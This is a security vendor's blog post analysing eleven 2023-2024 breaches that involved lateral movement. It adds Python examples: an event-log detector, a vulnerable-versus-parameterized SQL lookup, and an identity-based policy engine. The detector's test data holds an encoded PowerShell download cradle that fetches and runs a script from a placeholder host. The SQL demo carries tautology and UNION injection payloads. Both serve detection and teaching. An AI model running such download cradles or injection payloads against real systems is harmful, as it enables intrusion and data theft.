Elisity Blog

The Top 11 Cyberattacks Using Lateral Movement: A 2023-2024 Analysis for Enterprise Security Leaders

Preventing Lateral Movement is a Key Strategy for 2025

The modern cyber threat landscape is evolving rapidly, with attackers constantly finding new ways to breach enterprise networks. Among their most insidious tactics is lateral movement, a method that allows adversaries to infiltrate, explore, and exploit interconnected systems while evading detection.

Lateral movement poses a significant risk, especially for organizations managing vast digital ecosystems with thousands of devices. With over 70% of successful breaches (ransomware intrusions among them) involving lateral movement, enterprises must take proactive measures to contain it. The financial stakes are immense: a single breach can cost millions in lost revenue, operational disruption, and compliance fines.

For large organizations—those with over 3,000 users and/or devices—this issue is more pressing than ever. In this post, we'll explore 11 notable cyberattacks from 2023-2024 where lateral movement played a central role and examine how modern solutions, like microsegmentation, can mitigate this risk.

Understanding Lateral Movement in Modern Enterprise Networks

Lateral movement refers to the techniques attackers use to navigate through a network after gaining initial access. Unlike perimeter-focused attacks, lateral movement allows threat actors to escalate privileges, access sensitive data, and deploy payloads, all while avoiding detection.

Key attack patterns include:

  • Credential Harvesting and Reuse: Dumping credentials from memory or the registry and replaying them with techniques like Pass-the-Hash lets attackers authenticate as legitimate users without ever cracking a password
  • Remote Services Abuse: Legitimate administrative protocols such as RDP, SMB (admin shares and PsExec-style service creation) and WinRM become the transport for lateral movement once the attacker holds valid credentials
  • Living Off the Land: Attackers rely on built-in tools, such as PowerShell, WMI and netsh, so their activity blends in with normal administration

Traditional security measures, including firewalls and antivirus tools, often fail to prevent or detect these sophisticated tactics. Scaling traditional firewalls to effectively prevent lateral movement is challenging because they are primarily designed to monitor and control traffic at the network perimeter, lacking the granular visibility and control required to manage internal east-west traffic within modern, dynamic enterprise environments. With an average detection time of 95 days, the consequences for enterprises can be catastrophic, especially in manufacturing, healthcare, and critical infrastructure sectors.
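The three patterns listed above each leave a footprint in ordinary Windows telemetry. The detector below is an added example written for this post (not Elisity code and not taken from any of the cited reports): it runs three simple rules over a handful of constructed Security-log events, flagging an account fanning out NTLM network logons to many hosts (the visible shadow of Pass-the-Hash), a PsExec service install on a target, and an encoded PowerShell launch. Event IDs and field names follow the Windows Security log (4624 logon, 4688 process creation, 7045 service install); the hostnames, accounts, staging URL and the events themselves are invented.

```python
"""Toy lateral-movement detector over constructed Windows Security events.

Added illustration for this post; not Elisity code. Hostnames, accounts and
the staging URL are invented, and the events are hand-built to exercise the rules.
"""
import base64
import re
from collections import defaultdict

# A typical encoded PowerShell download cradle (constructed; 198.51.100.0/24 is a
# documentation range, not a real host).
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage')".encode("utf-16le")
).decode()

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

EVENTS = [
    # 4624 logon type 3 (network) with NTLM: one account from WS01 to four different servers
    {"EventID": 4624, "LogonType": 3, "AuthPackage": "NTLM", "TargetUser": "svc_backup", "Workstation": "WS01", "Computer": "FS01"},
    {"EventID": 4624, "LogonType": 3, "AuthPackage": "NTLM", "TargetUser": "svc_backup", "Workstation": "WS01", "Computer": "FS02"},
    {"EventID": 4624, "LogonType": 3, "AuthPackage": "NTLM", "TargetUser": "svc_backup", "Workstation": "WS01", "Computer": "SQL01"},
    {"EventID": 4624, "LogonType": 3, "AuthPackage": "NTLM", "TargetUser": "svc_backup", "Workstation": "WS01", "Computer": "DC01"},
    # benign: a Kerberos network logon to a single file server, and an interactive logon
    {"EventID": 4624, "LogonType": 3, "AuthPackage": "Kerberos", "TargetUser": "alice", "Workstation": "WS07", "Computer": "FS01"},
    {"EventID": 4624, "LogonType": 2, "AuthPackage": "Kerberos", "TargetUser": "alice", "Workstation": "WS07", "Computer": "WS07"},
    # 7045: PsExec installs and starts its service on the target; a benign install for contrast
    {"EventID": 7045, "Computer": "FS02", "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "WS07", "ServiceName": "Updater", "ImagePath": "C:\\Program Files\\Vendor\\updater.exe"},
    # 4688: encoded PowerShell on SQL01 versus an ordinary scripted run on a workstation
    {"EventID": 4688, "Computer": "SQL01", "NewProcessName": PS, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENC},
    {"EventID": 4688, "Computer": "WS07", "NewProcessName": PS, "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]


def ntlm_fanout(events, threshold=3):
    """One (source host, account) pair logging on over NTLM to >= threshold distinct hosts."""
    targets = defaultdict(set)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] == 3 and e["AuthPackage"] == "NTLM":
            targets[(e["Workstation"], e["TargetUser"])].add(e["Computer"])
    return [{"rule": "ntlm_fanout", "source": src, "user": user, "targets": sorted(hosts)}
            for (src, user), hosts in targets.items() if len(hosts) >= threshold]


def psexec_service(events):
    """Service install whose name or binary is PsExec's PSEXESVC."""
    return [{"rule": "psexec_service", "host": e["Computer"], "service": e["ServiceName"]}
            for e in events
            if e["EventID"] == 7045 and "psexesvc" in (e["ServiceName"] + e["ImagePath"]).lower()]


# -e, -ec, -en, -enc and -EncodedCommand all select an encoded command; longest alternative first.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded script for an encoded PowerShell command line, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")  # PowerShell encodes as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def encoded_powershell(events):
    """powershell.exe started with an encoded command; the finding carries the decoded script."""
    out = []
    for e in events:
        if e["EventID"] != 4688 or not e["NewProcessName"].lower().endswith("powershell.exe"):
            continue
        decoded = decode_encoded_command(e["CommandLine"])
        if decoded is not None:
            out.append({"rule": "encoded_powershell", "host": e["Computer"], "decoded": decoded})
    return out


def detect(events):
    return ntlm_fanout(events) + psexec_service(events) + encoded_powershell(events)


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Each rule is deliberately narrow so that it can be read at a glance; in a SIEM the same logic is usually expressed as Sigma rules with a time window on the fan-out count. The NTLM rule stands out most in environments where NTLM is disabled or restricted, which is itself a cheap hardening step against Pass-the-Hash.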

Notable Cyberattacks Utilizing Lateral Movement (2023-2024)

MOVEit Transfer Vulnerability Exploitation (2023)

  • Attack Name/Family: MOVEit Transfer Vulnerability (CVE-2023-34362)
  • Source: Initially unattributed; later attributed to the Cl0p extortion group
  • Affected Organizations: Multiple organizations using MOVEit Transfer for secure file transfers
  • Description: In 2023, attackers exploited a SQL injection vulnerability in the MOVEit Transfer web application, sending specially crafted HTTP requests that altered the queries the application ran against its database. That gave them unauthenticated access to the application's data store, from which they deployed a web shell, enumerated users and files, and exfiltrated data; the compromised transfer server then served as a foothold for lateral movement within affected networks.
  • MITRE ATT&CK Tactics: Initial Access (T1190), Execution (T1059), Persistence (T1078), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
  • Reference: https://cloud.google.com/blog/topics/threat-intelligence/zero-day-moveit-data-theft 
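To make the bug class concrete, here is an added example in Python against an in-memory SQLite table. It is not MOVEit's code and the payloads are textbook ones, not the requests used against CVE-2023-34362; the table, tokens and a "download by token" lookup standing in for a file-transfer endpoint are constructed. The vulnerable lookup splices the request parameter into the SQL text; the parameterized one sends it separately, so the same payloads return nothing.

```python
"""SQL injection in a file-lookup endpoint, vulnerable and fixed (added example).

Not MOVEit's code: a constructed SQLite table stands in for a file-transfer
application's database so the example runs offline.
"""
import sqlite3


def make_db():
    """Constructed sample data: files owned by three users, each fetched by a token."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE files(id INTEGER PRIMARY KEY, owner TEXT, name TEXT, token TEXT);
        INSERT INTO files VALUES (1, 'alice', 'payroll.xlsx', 'tok-alice-1');
        INSERT INTO files VALUES (2, 'bob', 'contracts.zip', 'tok-bob-7');
        INSERT INTO files VALUES (3, 'carol', 'merger.pdf', 'tok-carol-3');
    """)
    return con


def lookup_vulnerable(con, token):
    """The bug class: the HTTP parameter becomes part of the SQL statement text."""
    sql = "SELECT owner, name FROM files WHERE token = '" + token + "'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con, token):
    """The fix: the parameter is bound separately and is never parsed as SQL."""
    return con.execute("SELECT owner, name FROM files WHERE token = ?", (token,)).fetchall()


# Two constructed payloads of the kind carried in a crafted request parameter.
TAUTOLOGY = "x' OR '1'='1"                                      # makes the WHERE clause true for every row
SCHEMA_PROBE = "' UNION SELECT name, sql FROM sqlite_master--"  # reads the schema instead of a file row


def demo():
    """Run both lookups against both payloads and return the rows each produced."""
    con = make_db()
    return {
        "normal": lookup_vulnerable(con, "tok-bob-7"),
        "vuln_tautology": lookup_vulnerable(con, TAUTOLOGY),    # every user's file
        "vuln_schema": lookup_vulnerable(con, SCHEMA_PROBE),    # table definitions
        "safe_tautology": lookup_parameterized(con, TAUTOLOGY), # no such token
        "safe_schema": lookup_parameterized(con, SCHEMA_PROBE), # no such token
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Parameterization closes the injection itself; what limited the damage in the MOVEit cases was everything around it, such as the privileges of the database account, whether the transfer server could reach the rest of the network, and how quickly the anomalous queries and the web shell were noticed.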

BlackCat/ALPHV Ransomware Attack on Change Healthcare (2024)

  • Attack Name/Family: BlackCat/ALPHV Ransomware
  • Source: BlackCat/ALPHV ransomware group
  • Affected Organizations: Change Healthcare
  • Description: In February 2024, a BlackCat/ALPHV affiliate gained access to Change Healthcare through a Citrix remote-access portal that was not protected by multi-factor authentication, using compromised credentials. From there they moved laterally across the network, exfiltrated sensitive data, and then deployed ransomware to encrypt systems, using both the encryption and the stolen data to pressure the organization into paying. The attack disrupted claims processing and pharmacy operations across the U.S. healthcare system, and a ransom payment of approximately $22 million was reported.
  • MITRE ATT&CK Tactics: Initial Access (T1078), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1027), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041), Impact (T1486)
  • Reference: https://krebsonsecurity.com/2024/03/blackcat-ransomware-group-implodes-after-apparent-22m-ransom-payment-by-change-healthcare/ 

3CX Supply Chain Attack (2023)

  • Attack Name/Family: 3CX Supply Chain Attack
  • Source: Suspected North Korean Lazarus Group
  • Affected Organizations: Users of 3CX Phone System across various industries
  • Description: In March 2023, attackers compromised the 3CX desktop client's build and distribution chain, shipping trojanized, validly signed macOS and Windows installers. Once installed, the trojanized client retrieved second-stage payloads and gave the attackers a foothold from which to move laterally within victim networks, in some cases deploying the Gopuram backdoor to exfiltrate data and maintain persistence.
  • MITRE ATT&CK Tactics: Initial Access (T1195), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
  • Reference: https://www.crowdstrike.com/blog/3cx-supply-chain-attack-technical-analysis-and-remediation-guidance/ 

Volt Typhoon Campaign (2023-2024)

  • Attack Name/Family: Volt Typhoon
  • Source: Chinese state-sponsored hackers
  • Affected Organizations: U.S. critical infrastructure sectors, including power grids and transportation hubs
  • Description: Active against U.S. infrastructure targets for several years before its public disclosure in 2023, Volt Typhoon gained initial access by exploiting vulnerabilities in internet-facing devices and routed its traffic through compromised small-office/home-office routers to blend in with normal traffic. Once inside, the group relied on valid accounts and living-off-the-land tooling (built-in Windows commands such as netsh, wmic and ntdsutil) to move laterally and collect credentials, which makes the activity hard to distinguish from routine administration; the observed objective was espionage and pre-positioning for potential disruptive operations.
  • MITRE ATT&CK Tactics: Initial Access (T1078), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
  • Reference: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-u-s-critical-infrastructure-with-living-off-the-land-techniques/ 

LockBit Ransomware Attacks (2023-2024)

  • Attack Name/Family: LockBit Ransomware
  • Source: LockBit ransomware group
  • Affected Organizations: Various organizations across multiple sectors globally
  • Description: LockBit, run as ransomware-as-a-service, continued operating through 2023 and 2024 with affiliates targeting organizations worldwide. Affiliates typically gained initial access through phishing, exposed RDP or unpatched internet-facing vulnerabilities, then moved laterally by harvesting credentials with Mimikatz and using PsExec for remote execution to push the payload to other hosts. Between January 2020 and May 2023, LockBit was responsible for approximately 1,700 ransomware attacks in the U.S., with about $91 million paid in ransoms.
  • MITRE ATT&CK Tactics: Initial Access: Exploit Public-Facing Application (T1190), Execution: Command and Scripting Interpreter (T1059), Persistence: Server Software Component (T1505), Privilege Escalation: Exploitation for Privilege Escalation (T1068), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: Unsecured Credentials (T1552), Discovery: System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Information Repositories (T1213), Exfiltration: Exfiltration Over Web Service (T1567)
  • Reference: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a 

PyPI Supply Chain Attack (2024)

  • Attack Name/Family: JarkaStealer Malware
  • Source: Unknown threat actors
  • Affected Organizations: Developers and organizations utilizing compromised Python packages
  • Description: In 2024, attackers uploaded packages to the Python Package Index (PyPI) that bundled the JarkaStealer information stealer. Installing one on a developer workstation ran the stealer, which harvested browser data, session tokens and credentials and exfiltrated them to the attackers. Credentials taken this way are exactly what an intruder reuses to reach other systems in the developer's environment, which is how a single poisoned dependency turns into access to source code and intellectual property.
  • MITRE ATT&CK Tactics: Supply Chain Compromise (T1195), User Execution (T1204), Boot or Logon Autostart Execution (T1547), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), Input Capture (T1056), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
  • Reference: https://blog.sonatype.com/pypi-supply-chain-attack-exposes-open-source-ecosystem-vulnerabilities 

NKAbuse Malware Campaign (2023)

  • Attack Name/Family: NKAbuse Malware
  • Source: Unknown threat actors
  • Affected Organizations: Various organizations across multiple sectors
  • Description: Discovered in 2023, NKAbuse is a multiplatform implant written in Go that uses the NKN (New Kind of Network) blockchain-based peer-to-peer protocol for command and control, so there is no conventional C2 server to block or sinkhole. The documented infection began with exploitation of an old Apache Struts vulnerability on an internet-facing server; once installed, the implant gave its operators a persistent backdoor for moving further into the network, alongside a set of DDoS capabilities, on Linux servers and IoT devices.
  • MITRE ATT&CK Tactics and Techniques: Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), Server Software Component (T1505), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), OS Credential Dumping (T1003), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
  • Reference: https://securelist.com/nkabuse-north-korean-malware-campaign/104583/ 

Triangulation Spyware Campaign (2023)

  • Attack Name/Family: Triangulation Spyware
  • Source: Unattributed; assessed to be a well-resourced Advanced Persistent Threat (APT) group
  • Affected Organizations: Individuals and organizations using iOS devices
  • Description: In 2023, the Triangulation spyware campaign targeted iOS devices with a zero-click exploit chain delivered through iMessage attachments, requiring no interaction from the victim. Rather than hopping between hosts, the resulting in-memory implant used the compromised phone as a pivot into the victim's accounts and communications, pulling data from encrypted messaging apps, GPS location, microphone recordings and other sensitive information from multiple applications and exfiltrating it to attacker-controlled infrastructure.
  • MITRE ATT&CK Tactics and Techniques: Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), Boot or Logon Autostart Execution (T1547), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), Input Capture (T1056), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
  • Reference: https://securelist.com/operation-triangulation/109120/ 

EastWind Campaign (2024)

  • Attack Name/Family: EastWind Campaign utilizing CloudSorcerer, GrewApacha, and PlugX malware
  • Source: Attributed to Chinese state-sponsored groups APT31 and APT27
  • Affected Organizations: Russian government agencies and IT companies
  • Description: In late July 2024, the EastWind campaign targeted Russian entities using phishing emails containing malicious shortcut attachments. Upon execution, these attachments deployed multiple malware tools to move laterally within networks, exfiltrate sensitive data, and maintain persistent access.
  • MITRE ATT&CK Tactics and Techniques: Initial Access: Spear Phishing Attachment (T1566.001), Execution: User Execution (T1204), Persistence: Registry Run Keys / Startup Folder (T1547.001), Privilege Escalation: Process Injection (T1055), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: Credential Dumping (T1003), Discovery: System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Local System (T1005), Exfiltration: Exfiltration Over C2 Channel (T1041)
  • Reference:  https://securelist.com/eastwind-apt-campaign/113345/

Johnson Controls Ransomware Attack (2023)

  • Attack Name/Family: Dark Angels Ransomware
  • Source: Dark Angels hacking group
  • Affected Organizations: Johnson Controls, a technology provider specializing in smart and sustainable buildings
  • Description: In late September 2023, Johnson Controls suffered a ransomware attack in which the Dark Angels group demanded a $51 million ransom. The attackers claimed to have stolen approximately 27 terabytes of data and encrypted the company's VMware ESXi servers; reaching and encrypting the virtualization layer from an initial foothold is itself evidence of extensive lateral movement within the network.
  • MITRE ATT&CK Tactics and Techniques: Initial Access: Valid Accounts (T1078), Execution: Command and Scripting Interpreter (T1059), Persistence: Account Manipulation (T1098), Privilege Escalation: Exploitation for Privilege Escalation (T1068), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: OS Credential Dumping (T1003), Discovery: System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Local System (T1005), Exfiltration: Exfiltration Over C2 Channel (T1041), Impact: Data Encrypted for Impact (T1486)
  • Reference: https://www.bleepingcomputer.com/news/security/johnson-controls-hit-by-ransomware-attack-disrupting-operations/ 

Kroll Cybersecurity Data Breach (2023)

  • Attack Name/Family: SIM Swapping Attack
  • Source: Unknown Threat Actors
  • Affected Organizations: Kroll, a leading global provider of risk and financial advisory solutions
  • Description: In August 2023, an attacker SIM-swapped the mobile number of a Kroll employee, hijacking the SMS-based one-time codes protecting that employee's account and thereby gaining unauthorized access to Kroll's systems. From that foothold they moved laterally into email and sensitive communications and reached files tied to high-profile bankruptcy cases Kroll was administering, exposing personal data of claimants in those proceedings. The weak link was the second factor itself: SMS codes go to whoever controls the phone number, whereas phishing-resistant MFA (FIDO2 security keys or device-bound platform authenticators) is unaffected by a SIM swap. While the financial impact remains undisclosed, the breach caused significant reputational and legal fallout for Kroll and its clients. In response, Kroll strengthened its MFA practices and internal monitoring.
  • Reference: https://techcrunch.com/2023/08/29/kroll-cyber-breach-sim-swapping/ 

Key Lessons from Recent Attacks

The analysis of recent cyberattacks reveals critical patterns and vulnerabilities that enterprises must address to prevent lateral movement. One prominent lesson is the recurring exploitation of unpatched systems. Many of the highlighted attacks leveraged known vulnerabilities, emphasizing the urgent need for regular and proactive patch management. Another key insight is the reliance on credential harvesting and misuse, demonstrating that weak or improperly managed authentication mechanisms continue to be a significant entry point for attackers.

Industry-specific impacts also provide valuable lessons. Manufacturing and healthcare sectors, with their unique integrations of IT and OT systems, face heightened risks. Attackers in these environments often exploit interconnections to compromise both digital and physical processes. Similarly, critical infrastructure organizations must contend with regulatory requirements that demand segmentation and monitoring to prevent lateral movement.

Modern Approaches to Preventing Lateral Movement

Preventing lateral movement requires a departure from traditional security models, which often rely on static boundaries and implicit trust. Instead, modern approaches emphasize dynamic and adaptive security measures. Identity-based microsegmentation has emerged as a leading strategy, enabling organizations to enforce least-privilege access across users, devices, and workloads. By dynamically adapting policies based on identity and context, this approach ensures that only authorized entities can interact with critical systems.

Zero Trust architecture also plays a pivotal role in mitigating lateral movement risks. By continuously verifying all access requests and assuming that no entity is inherently trustworthy, Zero Trust creates robust barriers to lateral movement. Integrating these modern approaches with existing security infrastructure, such as SIEM and EDR platforms, further strengthens an organization's defenses.

The Power of Identity-Based Microsegmentation

Identity-based microsegmentation represents a transformative leap forward in network security. Unlike traditional segmentation methods that rely on rigid network constructs, identity-based microsegmentation dynamically segments the network based on the attributes of users, workloads, and devices. Elisity's platform exemplifies this innovation through its Elisity IdentityGraph™ technology, which correlates metadata from across the network and metadata sources to create comprehensive, real-time insights into all connected entities.

This approach empowers enterprises to enforce granular security policies without disrupting operations. By decoupling access controls from underlying network infrastructure, Elisity's solution simplifies implementation while delivering unparalleled visibility and control. Organizations can effectively contain threats, minimize the blast radius of attacks, and ensure compliance with regulatory requirements. Identity-based microsegmentation is not just a security enhancement—it is a foundational component of a resilient cybersecurity strategy.
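What "policy keyed on identity and context rather than network constructs" means in practice is easiest to see in a small policy engine. The one below is an added example written for this post; it is not Elisity code and says nothing about how the Elisity platform evaluates policy internally. Rules match on labels carried by users, devices and workloads (role, department, tier, posture), never on addresses, so a workstation keeps the same access when it moves subnets, two servers on the same segment cannot talk unless a rule says so, and a context change (an EDR quarantine label) cuts access without rewriting rules. All entity names, labels and rules are constructed.

```python
"""Identity-based east-west policy evaluation (added example, not Elisity code).

Entities carry identity/context labels; rules match on labels only. The IP field
exists to show that the decision does not depend on it. Everything here is constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Entity:
    name: str
    labels: frozenset   # identity and context attributes, e.g. "role:admin", "tier:db"
    ip: str = ""        # carried for logging only; policy never reads it


@dataclass(frozen=True)
class Rule:
    name: str
    src: frozenset      # labels the source must carry (all of them)
    dst: frozenset      # labels the destination must carry (all of them)
    services: frozenset # allowed (proto, port) pairs; empty means any service
    action: str         # "allow" or "deny"


def rule_matches(rule, src, dst, proto, port):
    return (rule.src <= src.labels and rule.dst <= dst.labels
            and (not rule.services or (proto, port) in rule.services))


def evaluate(policy, src, dst, proto, port):
    """First matching rule wins; an unmatched flow is denied (default deny)."""
    for rule in policy:
        if rule_matches(rule, src, dst, proto, port):
            return rule.action, rule.name
    return "deny", "default-deny"


def with_label(entity, label):
    """Copy of the entity with one more context label, e.g. a posture flag from EDR."""
    return Entity(entity.name, entity.labels | {label}, entity.ip)


L = frozenset  # shorthand for building label sets

POLICY = [
    # Context first: a quarantined source gets nothing, whatever its role.
    Rule("quarantine", L({"posture:quarantined"}), L(), L(), "deny"),
    # Only admins working from a jump host may RDP to servers.
    Rule("admins-rdp-servers", L({"role:admin", "device:jumphost"}), L({"kind:server"}), L({("tcp", 3389)}), "allow"),
    # Finance workstations may reach the file share over SMB, and nothing else on servers.
    Rule("users-file-share", L({"kind:user-device", "dept:finance"}), L({"kind:server", "svc:file-share"}), L({("tcp", 445)}), "allow"),
    # App tier to database tier on the SQL port only.
    Rule("app-to-db", L({"tier:app"}), L({"tier:db"}), L({("tcp", 1433)}), "allow"),
]

WS01 = Entity("WS01", L({"kind:user-device", "dept:finance", "user:alice"}), "10.1.20.15")
JUMP01 = Entity("JUMP01", L({"kind:user-device", "role:admin", "device:jumphost"}), "10.1.99.5")
FS01 = Entity("FS01", L({"kind:server", "svc:file-share"}), "10.2.0.10")
APP01 = Entity("APP01", L({"kind:server", "tier:app"}), "10.2.1.10")
SQL01 = Entity("SQL01", L({"kind:server", "tier:db"}), "10.2.2.10")


def decisions():
    """Evaluate a set of representative flows; keys describe the flow."""
    moved_ws01 = Entity(WS01.name, WS01.labels, "10.7.44.9")  # same identity, different subnet
    return {
        "ws01->fs01 smb": evaluate(POLICY, WS01, FS01, "tcp", 445),
        "ws01->sql01 mssql": evaluate(POLICY, WS01, SQL01, "tcp", 1433),
        "ws01->fs01 rdp": evaluate(POLICY, WS01, FS01, "tcp", 3389),
        "jump01->fs01 rdp": evaluate(POLICY, JUMP01, FS01, "tcp", 3389),
        "app01->sql01 mssql": evaluate(POLICY, APP01, SQL01, "tcp", 1433),
        "sql01->fs01 smb": evaluate(POLICY, SQL01, FS01, "tcp", 445),
        "moved ws01->fs01 smb": evaluate(POLICY, moved_ws01, FS01, "tcp", 445),
        "quarantined jump01->fs01 rdp": evaluate(POLICY, with_label(JUMP01, "posture:quarantined"), FS01, "tcp", 3389),
    }


if __name__ == "__main__":
    for flow, (action, rule) in decisions().items():
        print(f"{flow:32} {action:5} ({rule})")
```

The two decisions worth dwelling on are SQL01 to FS01 over SMB, denied although both are servers that would typically sit in one VLAN, and the quarantined jump host, denied RDP the moment its posture label changes; those are the containment behaviours that stop the credential-plus-PsExec pattern seen in the LockBit and BlackCat cases above.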

Implementation Strategy and Best Practices

Implementing a successful lateral movement prevention strategy requires a holistic approach encompassing people, processes, technology, and compliance. From a people perspective, cross-functional collaboration is essential. Security architects, network engineers, and compliance officers must work together to design and implement effective policies. Training and upskilling these teams ensure they are equipped to manage advanced microsegmentation platforms.

The process should begin with a thorough assessment of the organization's current security posture. Identifying critical assets and high-risk areas allows teams to prioritize their efforts. A phased implementation approach is often most effective, starting with the most vulnerable systems and gradually expanding to cover the entire network. This methodology minimizes disruption and provides opportunities to refine policies as the deployment scales.

From a technology standpoint, leveraging solutions like Elisity's platform simplifies deployment and management. By integrating seamlessly with existing infrastructure, Elisity reduces complexity while enhancing security. Compliance considerations must also be central to the strategy, ensuring that policies align with frameworks like NIST, IEC 62443, and HIPAA. Together, these elements create a robust framework for preventing lateral movement and protecting enterprise networks from evolving threats.

Next Steps

The rise in sophisticated cyberattacks utilizing lateral movement techniques underscores the critical need for modern security approaches. Identity-based microsegmentation, combined with Zero Trust principles, provides organizations with the tools they need to protect their expanding digital ecosystems. By learning from recent attacks and implementing comprehensive security strategies, enterprises can better defend against threats while maintaining operational efficiency.

Ready to enhance your organization's defense against lateral movement attacks? Contact Elisity today to learn how our identity-based microsegmentation platform can strengthen your security posture.
